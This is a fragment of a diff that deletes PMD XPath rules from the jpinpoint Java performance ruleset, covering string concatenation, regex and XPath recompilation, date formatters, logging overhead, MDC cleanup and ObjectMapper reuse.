-    <rule name="AvoidMultipleConcatStatements" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="Multiple statements concatenate to the same String. Use StringBuilder append." typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-ISU02">
-        <description>Multiple statements concatenate to the same String. Problem: Each statement with one or more +-operators creates a hidden temporary StringBuilder, a char[] and a new String object, which all have to be garbage collected.&#13;
-            Solution: Use StringBulder.append.
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-//MethodDeclaration/Block[
-count(
-./BlockStatement/Statement//StatementExpression/PrimaryExpression/PrimaryPrefix/Name
-[@Image=./../../../../../../../../../../../..//VariableDeclaratorId/attribute::Image
-and
-./../../../../../../..//VariableDeclaratorId/../../Type/ReferenceType/ClassOrInterfaceType[typeIs('java.lang.String')]
-]
-/../../../AssignmentOperator[@Image='+=']/
-../Expression//PrimaryExpression/PrimaryPrefix/Name) > 1]/BlockStatement[position()=last()]
-|
-//MethodDeclaration/Block[
-count(
-./BlockStatement/Statement//StatementExpression[
-./PrimaryExpression/PrimaryPrefix/Name[
-@Image = ../../../Expression/AdditiveExpression/PrimaryExpression/PrimaryPrefix/Name/@Image
-and
-@Image = ./../../../../../../../..//VariableDeclaratorId/../../Type/ReferenceType/ClassOrInterfaceType[typeIs('java.lang.String')]/../../../VariableDeclarator/VariableDeclaratorId/attribute::Image
-]
-]) > 1 ]//BlockStatement[position()=last()]//StatementExpression/Expression/AdditiveExpression[@Image = '+']
-	]]></value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="AvoidRecompilingPatterns" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="Pattern.compile is used in a method. Compiling a regex pattern can be expensive, make it a static final field." typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-IREU02">
-        <description>A regular expression is compiled on every invocation. Problem: this can be expensive, depending on the length of the regular expression.&#13;
-            Solution: Usually a pattern is a literal, not dynamic and can be compiled only once. Assign it to a private static field. java.util.Pattern objects are thread-safe so they can be shared among threads.
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-//TypeDeclaration/ClassOrInterfaceDeclaration/ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/MethodDeclaration
-//PrimaryExpression/PrimaryPrefix/Name[ends-with(@Image, '.compile') and
-count(../../PrimarySuffix/Arguments/ArgumentList/Expression//PrimaryExpression) = 1
-and not (
-../../PrimarySuffix/Arguments/ArgumentList/Expression/PrimaryExpression/PrimaryPrefix/Name/@Image=
-ancestor::MethodDeclaration/MethodDeclarator/FormalParameters/FormalParameter/VariableDeclaratorId/@Image)]
-	]]></value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="AvoidRecompilingXPathExpression" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="XPathExpression is created and compiled every time. Beware it is thread-unsafe." typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-UX02">
-        <description>XPathExpression is created and compiled on every method call. Problem: Creation XPath and compilation of XPathExpression takes time. It may slow down your application. &#13;
-            Solution: 1. Avoid XPath usage. 2. Since XPath and XPathExpression classes are thread-unsafe, they are not easily cached. Caching in Thread locals may be a solution.
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-//TypeDeclaration/ClassOrInterfaceDeclaration/ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/MethodDeclaration
-//PrimaryExpression/PrimaryPrefix/Name[ends-with(@Image,'.newXPath')]
-/ancestor::ClassOrInterfaceBodyDeclaration
-//PrimaryExpression/PrimaryPrefix/Name[ends-with(@Image, '.compile')]
-	]]></value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="AvoidRecreatingDateTimeFormatter"
-          message="Avoid recreating DateTimeFormatter, it is relatively expensive."
-          class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java"
-          typeResolution="true" externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-IDTF02">
-        <description>
-            Problem: Recreating a DateTimeFormatter is relatively expensive.&#13;
-            Solution: org.joda.time.format.DateTimeFormatter or Java 8 java.time.DateTimeFormatter is thread-safe and can be shared among threads. Create the
-            formatter from a pattern only once, to initialize a static final field.
-            (jpinpoint-rules)</description>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value>
-                    <![CDATA[
-    //FieldDeclaration[@Final='false' or @Static='false']//ReferenceType/ClassOrInterfaceType[typeIs('org.joda.time.format.DateTimeFormatter') or typeIs('org.threeten.bp.format.DateTimeFormatter') or typeIs('java.time.format.DateTimeFormatter')] |
-    //MethodDeclaration/Block//ReferenceType/ClassOrInterfaceType[typeIs('org.joda.time.format.DateTimeFormatter') or typeIs('org.threeten.bp.format.DateTimeFormatter') or typeIs('java.time.format.DateTimeFormatter')]
-[ancestor::LocalVariableDeclaration/VariableDeclarator/VariableInitializer/Expression//PrimaryPrefix/Literal] |
-    //MethodDeclaration/Block/BlockStatement//Expression//AllocationExpression/ClassOrInterfaceType[typeIs('org.joda.time.format.DateTimeFormatter') or typeIs('org.threeten.bp.format.DateTimeFormatter') or typeIs('java.time.format.DateTimeFormatter')] |
-    //MethodDeclaration/Block/BlockStatement//Expression/PrimaryExpression/PrimaryPrefix/Name[starts-with(@Image, 'ISODateTimeFormat.')] |
-    //MethodDeclaration/Block/BlockStatement//Expression/PrimaryExpression/PrimaryPrefix/Name[starts-with(@Image, 'DateTimeFormat.')
-       and not (ends-with(@Image, 'forPattern'))] |
-   //MethodDeclaration/Block/BlockStatement//Expression/PrimaryExpression/PrimaryPrefix/Name[starts-with(@Image, 'DateTimeFormat.forPattern')]
-[ancestor::Expression//PrimaryPrefix/Literal] |
-    //MethodDeclaration/Block/BlockStatement//Expression/PrimaryExpression/PrimarySuffix[@Image='toFormatter']
-]]>
-                </value>
-            </property>
-        </properties>
-        <priority>2</priority>
-    </rule>
-
-    <rule name="AvoidReflectionInToStringAndHashCode" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="Reflection is used in toString or hashCode, which is expensive." typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-UUOR01">
-        <description>Problem: Reflection is relatively expensive. &#13;
-            Solution: Avoid to use reflection. Use the non-reflective, explicit way, preferably using Guava.
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-//PrimaryPrefix/AllocationExpression/ClassOrInterfaceType
-	[
-		typeIs('org.apache.commons.lang.builder.EqualsBuilder')
-		or typeIs('org.apache.commons.lang.builder.HashCodeBuilder')
-	]
-[../../../PrimarySuffix[1]
-	[
-		@Image='reflectionEquals'
-		or @Image='reflectionHashCode'
-	]
-] |
-//PrimaryPrefix/Name
-	[
-		@Image='EqualsBuilder.reflectionEquals'
-		or @Image='HashCodeBuilder.reflectionHashCode'
-	]
-	]]></value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="AvoidSimpleDateFormat" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="SimpleDateFormat is used. Since it is thread-unsafe, it needs expensive recreation."  typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-IDTF01">
-        <description>Problem: java.util.SimpleDateFormat is thread-unsafe. The usual solution is to create a new one when needed in a method. Creating SimpleDateFormat is relatively expensive. &#13;
-            Solution: Use a Joda-Time DateTimeFormat to create a specific DateTimeFormatter or Java 8 java.time.DateTimeFormatter. These classes are immutable, thus thread-safe and can be made static.
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
- //AllocationExpression/ClassOrInterfaceType[typeIs('java.text.SimpleDateFormat')]
-	]]></value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="AvoidStringBuffer" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="StringBuffer is used. It introduces locking overhead, use StringBuilder." typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-ISU01" >
-        <description>Problem: StringBuffer introduces locking overhead because it is thread safe. Its thread-safety is rarely needed.&#13;
-            Solution: Replace StringBuffer by StringBuilder.  (jpinpoint-rules)</description>
-        <priority>3</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-                    //VariableDeclarator[../Type/ReferenceType/ClassOrInterfaceType[typeIs('java.lang.StringBuffer')]]
-                    ]]></value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="AvoidUnconditionalBuiltLogStrings" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="Log String is built irrespective of log level." typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-IL02">
-        <description>A String to be logged is built unconditionally. Problem: String building, concatenation and/or other operations happen before the debug, trace or info method executes, so independent of the need to actually log. Concatenation is relatively expensive. &#13;
-            Solution: Build the String conditionally on the log level, within an if statement.
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-//MethodDeclaration/Block/BlockStatement/Statement//StatementExpression/PrimaryExpression/PrimaryPrefix/Name[
-(substring-before(@Image, '.') =
-ancestor::MethodDeclaration//BlockStatement/Statement/StatementExpression/PrimaryExpression/PrimaryPrefix/Name[ends-with
-(@Image, '.debug') or ends-with(@Image, '.trace') or ends-with(@Image, '.info')]
-/../../PrimarySuffix/Arguments/ArgumentList/Expression/PrimaryExpression/PrimaryPrefix/Name/attribute::Image
-and
-substring-after(@Image, '.') = 'append')
-and count(ancestor::IfStatement) = 0
-and
-count(ancestor::MethodDeclaration/Block/BlockStatement/Statement//PrimaryExpression/PrimaryPrefix/Name[
-(substring-before(@Image, '.') =
-ancestor::MethodDeclaration//BlockStatement/Statement//PrimaryExpression/PrimaryPrefix/Name[ends-with
-(@Image, '.debug') or ends-with(@Image, '.trace') or ends-with(@Image, '.info')]
-/../../PrimarySuffix/Arguments/ArgumentList//PrimaryExpression/PrimaryPrefix/Name/attribute::Image
-and
-substring-after(@Image, '.') != 'append')]) = 0
-]
-	]]></value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="AvoidWideScopeXPathExpression" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="XPathExpression targets a wide scope, this is potentially slow." typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-UX01">
-        <description>The XPathExpression targets a wide scope since it starts with '//'. Problem: XPath has to search in a wide scope for occurrences, this may take a while. &#13;
-            Solution: 1. Avoid XPath usage. 2. Make the scope as narrow as possible, do not start with '//'.
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-//TypeDeclaration/ClassOrInterfaceDeclaration/ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/MethodDeclaration
-//PrimaryExpression/PrimarySuffix[
-Arguments/ArgumentList/Expression/PrimaryExpression/PrimaryPrefix/
-Literal[starts-with(@Image, '"//')]
-and
-../PrimaryPrefix/Name[ends-with(@Image, '.compile')]
-]
-	]]></value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="AvoidXMLGregorianCalendar" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="XMLGregorianCalendar is used. It is slow in JAXB." typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-IUOXAR05">
-        <description>Problem: XMLGregorianCalendar is a large object, involving substantial processing. It is created with the poorly performing DatatypeFactory.
-            Solution: Add a converter for alternative date handling with joda-time or Java 8 java.time.
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-//TypeDeclaration/ClassOrInterfaceDeclaration/ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/
-FieldDeclaration/Type/ReferenceType/ClassOrInterfaceType[typeIs('javax.xml.datatype.XMLGregorianCalendar')]
-|
-//TypeDeclaration/ClassOrInterfaceDeclaration/ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/
-MethodDeclaration//LocalVariableDeclaration/Type/ReferenceType/ClassOrInterfaceType[typeIs('javax.xml.datatype.XMLGregorianCalendar')]
-	]]></value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="AvoidXPathAPIUsage" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="XPathAPI is used. XPathAPI implementation has bad performance." typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-UX03">
-        <description>XPathAPI is used. Problem: XPathAPI implementation is slow.&#13;
-            Solution: 1. try to avoid using XPathAPI. 2. improve performance by using jvm parameters and possibly CachedXPathAPI.
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-//TypeDeclaration/ClassOrInterfaceDeclaration/ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration
-//PrimaryExpression/PrimaryPrefix/Name[starts-with(@Image, 'XPathAPI.')]
-	]]></value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="AvoidXPathUsage" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="XPath is used. XPath implementation has bad performance." typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-UX03">
-        <description>XPath is used. Problem: XPath implementation is slow.&#13;
-            Solution: 1. avoid using XPath. 2. improve performance by using jvm parameters and possibly Cached XPath API.
-            (jpinpoint-rules)</description>
-        <priority>3</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-//TypeDeclaration/ClassOrInterfaceDeclaration/ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration
-//PrimaryExpression/PrimaryPrefix/Name[@Image='XPathFactory.newInstance']
-	]]></value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="HttpClientBuilderWithoutDisableConnectionState" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="A HttpClient builder is used and disableConnectionState is not called. HTTP client tracks connection state while using TLS" typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-IBI07">
-        <description>Problem: NTLM authenticated connections and SSL/TLS connections with client certificate authentication are stateful: they have a specific user identity/security context per session. If HttpClients have enabled connection state tracking which is the default, established TLS connections will not be reused because it is assumed that the user identity or security context may differ.
-            Then performance will suffer due to a full TLS handshake for each request.&#13;
-            Solution: HttpClients should disable connection state tracking in order to reuse TLS connections, since service calls for one pool have the same user identity/security context for all sessions. (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="2.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-(:locally created http client builder without disableConnectionState :)
-//MethodDeclaration//PrimaryExpression/PrimaryPrefix/Name[
-(@Image="HttpClientBuilder.create" or @Image="HttpAsyncClientBuilder.create" or @Image="HttpClients.custom") and not(
-ancestor::MethodDeclaration//PrimarySuffix/@Image="disableConnectionState")]
-,
-(: method param http client builder without disableConnectionState :)
-//MethodDeclaration//FormalParameter//ClassOrInterfaceType[
-(@Image="HttpClientBuilder" or @Image="HttpAsyncClientBuilder" or @Image="HttpClients") and not(
-ancestor::MethodDeclaration//PrimarySuffix/@Image="disableConnectionState")]
-			]]>
-                </value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="ImplementEqualsHashCodeOnValueObjects"
-          message="Equals and/or hashCode is missing for a value object."
-          class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java"
-          typeResolution="true" externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-IncorrectequalsandhashCode">
-        <description>
-            Problem: If equals and hashCode are not defined, they don't meet the programmer's expectations and the requirements for use with the collections API. It may result in unexpected, undesired behavior.&#13;
-            Solution: Add proper equals and hashCode methods that meet the equals-hashCode contract to all objects which might anyhow be put in a Map, Set or other collection. If the object should never be checked for equality or used in a collection, also add those methods and let them throw UnsupportedOperationException to fail fast. @Xml... and @Entity objects are ignored because they are assumed to be not used as value objects.
-            (jpinpoint-rules)</description>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value>
-                    <![CDATA[
-//TypeDeclaration[not(./Annotation//Name[@Image='Data' or @Image='Value' or @Image='EqualsAndHashCode'
-or @Image='Singleton' or @Image='Component' or @Image='Service' or @Image='Repository' or @Image='Configuration' or @Image='Endpoint' or @Image='RestController' or @Image='ControllerAdvice'
-or starts-with(@Image, 'Xml') or @Image='Entity' or @Image='Embeddable' or @Image='MappedSuperclass'])]
-/ClassOrInterfaceDeclaration[@Interface='false' and @Abstract='false']
-[not(./ExtendsList/ClassOrInterfaceType[ends-with(@Image, 'Exception') or ends-with(@Image, 'Throwable')])]
-/ClassOrInterfaceBody[ClassOrInterfaceBodyDeclaration/FieldDeclaration[@Static='false']
-[
-(not (../Annotation//Name[@Image = 'XmlElement']))
-and
-(
-ancestor::ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/MethodDeclaration
-[@Public='true' and @Static='false']/MethodDeclarator[starts-with(@Image, 'get') and string-length(@Image) > 3 or starts-with(@Image, 'is') and string-length(@Image) > 2]
-[../ResultType/Type/ReferenceType/ClassOrInterfaceType/@Image =
-ancestor::ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/FieldDeclaration[@Static='false']/Type/ReferenceType/ClassOrInterfaceType/@Image]
-)
-and
-(not (
-ancestor::ClassOrInterfaceBody//MethodDeclaration[@Public='true' and @Static='false']/MethodDeclarator[@Image='equals' or @Image='hashCode'])
-)
-and
-((ancestor::ClassOrInterfaceBody//MethodDeclaration[@Public='true' and @Static='false']/MethodDeclarator/@Image='toString'
-and
-count(ancestor::ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/FieldDeclaration[@Static='false']) <=
-(1 + count(ancestor::ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/MethodDeclaration
-[@Public='true' and @Static='false']/MethodDeclarator[starts-with(@Image, 'get') and string-length(@Image) > 3 or starts-with(@Image, 'is') and string-length(@Image) > 2]))
-)
-or
-ancestor::ClassOrInterfaceDeclaration[ends-with(@Image, 'Dto')]
-or
-count(ancestor::ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/FieldDeclaration[@Static='false']) =
-count(ancestor::ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/MethodDeclaration
-[@Public='true' and @Static='false']/MethodDeclarator[starts-with(@Image, 'get') and string-length(@Image) > 3 or starts-with(@Image, 'is') and string-length(@Image) > 2])
-)]
-]
-]]>
-                </value>
-            </property>
-        </properties>
-        <priority>3</priority>
-    </rule>
-
-    <rule name="JAXBContextCreatedForEachMethodCall" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="JAXBContext is created for each method call, which is expensive."  typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-IUOXAR04">
-        <description>Problem: JAXBContext creation is expensive because it does much class loading.  &#13;
-            Solution: Since JAXBContext objects are thread safe, they can be shared between requests and reused. So, reuse created instances, e.g. as singletons.
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-//MethodDeclaration//Expression/PrimaryExpression/PrimaryPrefix/Name[@Image = 'JAXBContext.newInstance']
-			]]></value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="MDCPutWithoutRemove" message="MDC put is used without finally remove." class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" typeResolution="true" externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-IL04">
-        <description>
-            MDC values are added for logging, but not removed. Problem: MDC values can leak to other user transactions (requests) and log incorrect information. Solution: remove the MDC value in a finally clause.
-            (jpinpoint-rules)</description>
-        <properties>
-            <property name="version" value="2.0"/>
-            <property name="xpath">
-                <value>
-                    <![CDATA[
-//MethodDeclaration//StatementExpression//Name[@Image='MDC.put']
-/../../PrimarySuffix/Arguments/ArgumentList/Expression[1]/PrimaryExpression/PrimaryPrefix/Literal[not(@Image=
-ancestor::MethodDeclaration//TryStatement/FinallyStatement//StatementExpression//Name[@Image='MDC.remove']
-/../../PrimarySuffix/Arguments/ArgumentList/Expression[1]/PrimaryExpression/PrimaryPrefix/Literal/@Image)
-and not(ancestor::MethodDeclaration//TryStatement/FinallyStatement//StatementExpression//Name[@Image='MDC.clear'])
-]
-|
-//MethodDeclaration//StatementExpression//Name[@Image='MDC.put']
-/../../PrimarySuffix/Arguments/ArgumentList/Expression[1]/PrimaryExpression/PrimaryPrefix/Name[not(@Image=
-ancestor::MethodDeclaration//TryStatement/FinallyStatement//StatementExpression//Name[@Image='MDC.remove']
-/../../PrimarySuffix/Arguments/ArgumentList/Expression[1]/PrimaryExpression/PrimaryPrefix/Name/@Image)
-and not(ancestor::MethodDeclaration//TryStatement/FinallyStatement//StatementExpression//Name[@Image='MDC.clear'])
-]
-]]>
-                </value>
-            </property>
-        </properties>
-        <priority>2</priority>
-    </rule>
-
-    <rule name="MinimizeAttributesInSession" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="Attribute is set in the session, yet not removed. This may bloat the session." typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-TMSU01">
-        <description>An attribute is set in the session and not removed. Problem: This may be a large object and data in the sessions takes heap space and stay in the session until time-out. This may take substantial heap space.&#13;
-            Solution: remove the attribute if not really needed in the session, remove it from the session as soon as possible. Alternatively, use render parameters.
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-//ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/MethodDeclaration//Block/BlockStatement/Statement[
-./StatementExpression/PrimaryExpression/PrimarySuffix[ends-with(@Image, 'setAttribute')]
-/ancestor::ClassOrInterfaceBodyDeclaration//ClassOrInterfaceBody[not(
-ClassOrInterfaceBodyDeclaration/MethodDeclaration//Block/BlockStatement/Statement/StatementExpression/PrimaryExpression/PrimarySuffix[ends-with(@Image, 'removeAttribute')]
-or
-ClassOrInterfaceBodyDeclaration/MethodDeclaration//Block/BlockStatement/Statement/StatementExpression/PrimaryExpression/PrimaryPrefix/Name[ends-with(@Image, 'removeAttribute')]
-)]]
-|
-//ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/MethodDeclaration//Block/BlockStatement/Statement[
-./StatementExpression/PrimaryExpression/PrimaryPrefix/Name[ends-with(@Image, 'setAttribute')]
-/ancestor::ClassOrInterfaceBodyDeclaration//ClassOrInterfaceBody[not(
-ClassOrInterfaceBodyDeclaration/MethodDeclaration//Block/BlockStatement/Statement/StatementExpression/PrimaryExpression/PrimarySuffix[ends-with(@Image, 'removeAttribute')]
-or
-ClassOrInterfaceBodyDeclaration/MethodDeclaration//Block/BlockStatement/Statement/StatementExpression/PrimaryExpression/PrimaryPrefix/Name[ends-with(@Image, 'removeAttribute')]
-)]]
-|
-//ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/MethodDeclaration//Block/BlockStatement/Statement[
-.//StatementExpression/PrimaryExpression/PrimaryPrefix/Name[@Image = 'PortletUtils.setSessionAttribute']
-/ancestor::ClassOrInterfaceBodyDeclaration//ClassOrInterfaceBody[not(
-ClassOrInterfaceBodyDeclaration/MethodDeclaration//Block/BlockStatement//Statement/StatementExpression/PrimaryExpression/PrimaryPrefix/Name[@Image = 'PortletUtils.setSessionAttribute']
-/../../PrimarySuffix/Arguments/ArgumentList/Expression/PrimaryExpression/PrimaryPrefix/Literal/NullLiteral
-)]]
-	]]></value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="ObjectMapperCreatedForEachMethodCall" message="An ObjectMapper is created for each method call, which is expensive." class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java"   typeResolution="true" externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-IUOJAR01">
-        <description>Problem: Jackson ObjectMapper creation is expensive because it does much class loading.  &#13;
-            Solution: Since ObjectMapper objects are thread-safe after configuration in one thread, they can be shared afterwards between requests and reused. So, reuse created instances, from a static field.
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-//MethodDeclaration//Expression/PrimaryExpression/PrimaryPrefix/AllocationExpression/ClassOrInterfaceType[
-	(typeIs('com.fasterxml.jackson.databind.ObjectMapper')) and
-	not(ancestor::TypeDeclaration/Annotation/MarkerAnnotation/Name/@Image='Configuration')
-]
-			]]></value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="UnconditionalConcatInLogArgument" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="String concatenation (+) is executed regardless of log level and can be expensive" typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-IL01">
-        <description>Problem: String concatenation (+) is executed regardless of log level and can be expensive. &#13;
-            Solution: Use SLF4J formatting with {}-placeholders or log and format conditionally.  (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-			//PrimaryPrefix/Name[ends-with(@Image,'.trace') or ends-with(@Image,'.debug') or ends-with(@Image,'.info')]/../../PrimarySuffix/Arguments/ArgumentList/Expression/AdditiveExpression
-			[PrimaryExpression/PrimaryPrefix/Name]
-			[not(ancestor::IfStatement/Expression/PrimaryExpression/PrimaryPrefix/Name[
-			ends-with(@Image,'.isTraceEnabled')
-			or ends-with(@Image,'.isDebugEnabled')
-			or ends-with(@Image,'.isInfoEnabled')
-			or ends-with(@Image,'.isLoggable')
-			])]
-]]></value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="UnconditionalOperationOnLogArgument" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="Operation is executed regardless of log level and can be expensive" typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-IL03">
-        <description>Problem: An operation is executed regardless of log level. This could be much processing while the result is typically not used. Detected are obj.toString() and operations with one or more arguments except usually cheap obj.get(arg).&#13;
-            Solution: Execute the operation only conditionally and utilize SLF4J formatting with {}-placeholders.  (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="2.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-          //PrimaryPrefix/Name
-            (: log levels typically/often not enabled :)
-            [
-            	ends-with(@Image,'.trace')
-            	or ends-with(@Image,'.debug')
-            	or ends-with(@Image,'.info')
-            ]
-            (: no violation if conditionally: only executed if level enabled is okay :)
-            [not(ancestor::IfStatement/Expression//PrimaryPrefix/Name
-            	[
-					ends-with(@Image,'.isTraceEnabled')
-					or ends-with(@Image,'.isDebugEnabled')
-					or ends-with(@Image,'.isInfoEnabled')
-					or ends-with(@Image,'.isLoggable')
-				])
-			]
-			(: in the log method :)
-            /../../PrimarySuffix/Arguments/ArgumentList/Expression//PrimaryExpression
-            [
-                (: toString on argument :)
-                PrimaryPrefix/Name[ends-with(@Image,'.toString')]
-                or
-                (: a method call with an argument list :)
-                (PrimarySuffix/Arguments/ArgumentList)
-                (: exclude a simple get(i), like list.get(0) or map.get(key), assumed to be fast :)
-                and not (PrimaryPrefix/Name[ends-with(@Image,'.get')])
-            ]
-			]]>
-                </value>
-            </property>
-        </properties>
-        <example>
-            <![CDATA[
-            LOG.debug("customer = {}", customer.toString()); // bad
-            LOG.debug("Complete Soap response: {}", getSoapMsgAsString(context.getMessage())); // bad
-
-            LOG.debug("customer = {}", customer); // good
-            if (LOG.isDebugEnabled()) { // good
-                LOG.debug("Complete Soap response: {}", getSoapMsgAsString(context.getMessage()));
-            }
-            ]]>
-        </example>
-    </rule>
-
-    <rule name="UsingSuppressWarnings" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="Using SuppressWarnings." typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance">
-        <description>(Informative) Problem: This rule detects problems, suppressing them without full knowledge can lead to the problems this rule is trying to prevent. &#13;
-            Solution: Suppress warnings judiciously based on full knowledge and report reasons to suppress (false positives) to the rule maintainers so these can be fixed. (jpinpoint-rules)</description>
-        <priority>4</priority>
